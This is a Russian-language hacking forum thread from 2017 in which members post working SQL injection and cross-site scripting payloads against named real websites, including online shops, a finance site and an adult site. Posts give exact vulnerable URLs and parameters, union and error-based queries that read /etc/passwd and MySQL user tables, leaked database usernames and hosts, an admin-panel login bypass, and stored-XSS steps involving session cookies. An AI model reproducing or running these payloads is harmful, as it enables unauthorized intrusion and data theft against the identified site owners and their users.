Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    SQLi Error base внедрение двойным запросом.
    Code:
    http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1
    root@HB-85|file_priv Y|5.5.19|Win64x86|
     
    1. Печа

      Печа Member

      Joined:
      9 May 2015
      Messages:
      39
      Likes Received:
      23
      Reputations:
      17
      Сайт: russikona.ru ТИЦ 160
      SQLi Error base
      russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64|
      Code:
      http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
      XSS-reflected:
      Code:
      http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(document.cookie)%3e
      Надеюсь ничьих чувств не оскорбил :)
       
      artkar likes this.
      1. Печа

        Печа Member

        Joined:
        9 May 2015
        Messages:
        39
        Likes Received:
        23
        Reputations:
        17
        Сайт: rakuraku-home.jp
        SQLi Error base через POST
        [email protected]|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|
        Уязвимые параметры account и password
        В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру
        эксплоит:
        Code:
        URL:http://www.rakuraku-home.jp/system/login/login.php
        POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
        вход в админку логин и пароль 1' or '1
        Админка:
        Code:
        http://www.rakuraku-home.jp/system/
         
        artkar likes this.
        1. Печа

          Печа Member

          Joined:
          9 May 2015
          Messages:
          39
          Likes Received:
          23
          Reputations:
          17
          Парочка сайтов с финансовой тематикой
          Сайт: eltee.de
          SQL Injection через GET, уязвимый параметр id, вывод в title
          pc-linux-gnu:i686:[email protected]:db456679871:5.1.73
          эксплоит:
          Code:
          view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@version_compile_machine,0x3a,user(),0x3a,database(),0x3a,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
          Сайт: businesstoday.lk
          SQL Injection через GET, уязвимый параметр issue
          5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i686:/usr
          эксплоит:
          Code:
          http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,user(),0x3a,@@version_compile_os,0x3a,@@version_compile_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
           
          1. Печа

            Печа Member

            Joined:
            9 May 2015
            Messages:
            39
            Likes Received:
            23
            Reputations:
            17
            Шоп с 3d принтерами и всяким оборудованием
            Сайт: smtmax.com
            SQL Injection через GET, уязвимый параметр act
            Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtmax:5.6.35:/usr
            эксплоит:
            Code:
            http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile_os%2c0x3a%2c%40%40version_compile_machine%2c0x3a%2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40version%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2))a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b)%2b%27
            Сайт адалт тематики: straightpornstuds.com
            Примерные данные за день
            Посетителей: 1469
            Просмотров: 5878
            Boolean Based SQL Injection
            5.0.96 log:str5lt3m [email protected]:str5lt3m1 2
            Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"
            Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"
            эксплоит:
            Code:
            http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1))=115).html
            P.s. когда true страничка может долго подгружаться.
             
            #265 Печа, 19 May 2017
            Last edited: 19 May 2017
            Coost, ACat, BFM and 2 others like this.
            1. Печа

              Печа Member

              Joined:
              9 May 2015
              Messages:
              39
              Likes Received:
              23
              Reputations:
              17
              Щоп с компьютерными аксессуарами
              Сайт: groupgear.co.uk
              MS SQL Injection через POST
              уязвимый параметр inputsearch
              microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)|
              computergear2012|computerSQL2014
              эксплоит:
              Code:
              URL:http://www.groupgear.co.uk/searchResults.asp POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='
               
              1. Печа

                Печа Member

                Joined:
                9 May 2015
                Messages:
                39
                Likes Received:
                23
                Reputations:
                17
                Сайт: magiclantern.org.uk
                Boolean Based SQL Injection черз GET, уязвимый параметр id
                5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1
                Если есть пост с заголовком The Temple of Minerva "true"
                Если нет поста с заголовком The Temple of Minerva "false"
                Эксплоит:
                Code:
                http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
                Stored XSS:
                Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject
                Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере
                Code:
                URL:http://www.magiclantern.org.uk/contact.php
                payload: "><img src=ssds onerror=alert(666) width=0 height=0>
                Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот
                Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,
                например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk
                в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
                 
                1. BabaDook

                  BabaDook Well-Known Member

                  Joined:
                  9 May 2015
                  Messages:
                  1,063
                  Likes Received:
                  1,559
                  Reputations:
                  40
                  НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой?
                  Там ещё мод сек, только что он делает я не понял
                  [​IMG]
                   
                  #268 BabaDook, 22 May 2017
                  Last edited: 22 May 2017
                  Печа likes this.
                  1. Печа

                    Печа Member

                    Joined:
                    9 May 2015
                    Messages:
                    39
                    Likes Received:
                    23
                    Reputations:
                    17
                    Code:
                    http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@version_compile_os,@@version_compile_machine,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+
                    Так лучше ? ))
                     
                    1. Печа

                      Печа Member

                      Joined:
                      9 May 2015
                      Messages:
                      39
                      Likes Received:
                      23
                      Reputations:
                      17
                      burpsuite, SQLmap, Netsparker
                       
                      1. Печа

                        Печа Member

                        Joined:
                        9 May 2015
                        Messages:
                        39
                        Likes Received:
                        23
                        Reputations:
                        17
                        SQLi с чтением файла из файловой системы и file_priv Y
                        Сайт:eohu.ca
                        Уязвимый параметор: newsID через GET
                        root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y
                        root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64
                        Эксплоит:
                        Code:
                        http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
                         
                        1. Печа

                          Печа Member

                          Joined:
                          9 May 2015
                          Messages:
                          39
                          Likes Received:
                          23
                          Reputations:
                          17
                          SQLi с чтением файла из файловой системы
                          Сайт:bbgv.org
                          Уязвимый параметор: cat_id через GET
                          root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N
                          root@localhost:5.1.73:redhat-linux-gnu:x86_64
                          Эксплоит:
                          Code:
                          view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9,10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
                           
                          1. Печа

                            Печа Member

                            Joined:
                            9 May 2015
                            Messages:
                            39
                            Likes Received:
                            23
                            Reputations:
                            17
                            Сайт:salut.ru ТИЦ 475
                            SQLi Error base черз GET, уязвимый параметр SectionId
                            salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
                            Эксплоит:
                            Code:
                            http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
                            Сайт:irbis-opt.ru ТИЦ 20 Всякие палатки и спортивная снаряга
                            SQLi черз GET, уязвимый параметр idd
                            [email protected]:10.1.22-MariaDB:Linux:x86_64:/usr
                            Эксплоит:
                            Code:
                            http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
                            Сайт:economic-study.ru ТИЦ 10 Вузы Москвы
                            SQLi черз GET, уязвимый параметр ID
                            vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
                            Эксплоит:
                            Code:
                            http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compile_os,@@version_compile_machine,@@basedir,10 --+
                             
                            1. Octavian

                              Octavian Elder - Старейшина

                              Joined:
                              8 Jul 2015
                              Messages:
                              506
                              Likes Received:
                              101
                              Reputations:
                              25
                              .ru саиты запрещены
                               
                              Veil likes this.
                              1. Печа

                                Печа Member

                                Joined:
                                9 May 2015
                                Messages:
                                39
                                Likes Received:
                                23
                                Reputations:
                                17
                                Я когда форум просматривал, посты с .ru часто попадались, или это новые правила?
                                Если админы скажут не вопрос, удалю свой пост.

                                Да и софтом я в .ru не лазил, искал через дорки и крутил руками
                                 
                                #275 Печа, 25 May 2017
                                Last edited: 25 May 2017
                                1. Печа

                                  Печа Member

                                  Joined:
                                  9 May 2015
                                  Messages:
                                  39
                                  Likes Received:
                                  23
                                  Reputations:
                                  17
                                  Сайт:ene.com.tw
                                  SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
                                  root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
                                  enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
                                  Эксплоит:
                                  Code:
                                  http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
                                   
                                  palec2006 and Imperou$ like this.
                                  1. BabaDook

                                    BabaDook Well-Known Member

                                    Joined:
                                    9 May 2015
                                    Messages:
                                    1,063
                                    Likes Received:
                                    1,559
                                    Reputations:
                                    40
                                  2. Octavian

                                    Octavian Elder - Старейшина

                                    Joined:
                                    8 Jul 2015
                                    Messages:
                                    506
                                    Likes Received:
                                    101
                                    Reputations:
                                    25
                                    Предугадываем URL восстановление пароля md5(time())
                                     
                                    Vip77, BigBear, Coost and 1 other person like this.
                                    1. paponi

                                      paponi New Member

                                      Joined:
                                      30 May 2017
                                      Messages:
                                      12
                                      Likes Received:
                                      4
                                      Reputations:
                                      0
                                      http://www.luxpodarok.com.ua/index.php?for=999999.9 union all select }here sql{
                                       
                                      1. x4t3a

                                        x4t3a New Member

                                        Joined:
                                        14 Feb 2017
                                        Messages:
                                        1
                                        Likes Received:
                                        0
                                        Reputations:
                                        0
                                        sqli: http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3
                                        а дальше не получается раскрутить :(
                                         
                                        Loading...
                                        Similar Threads - Уязвимости SQLi
                                        1. zase
                                          Replies:
                                          1
                                          Views:
                                          3,702
                                        2. Shadows_God
                                          Replies:
                                          14
                                          Views:
                                          8,616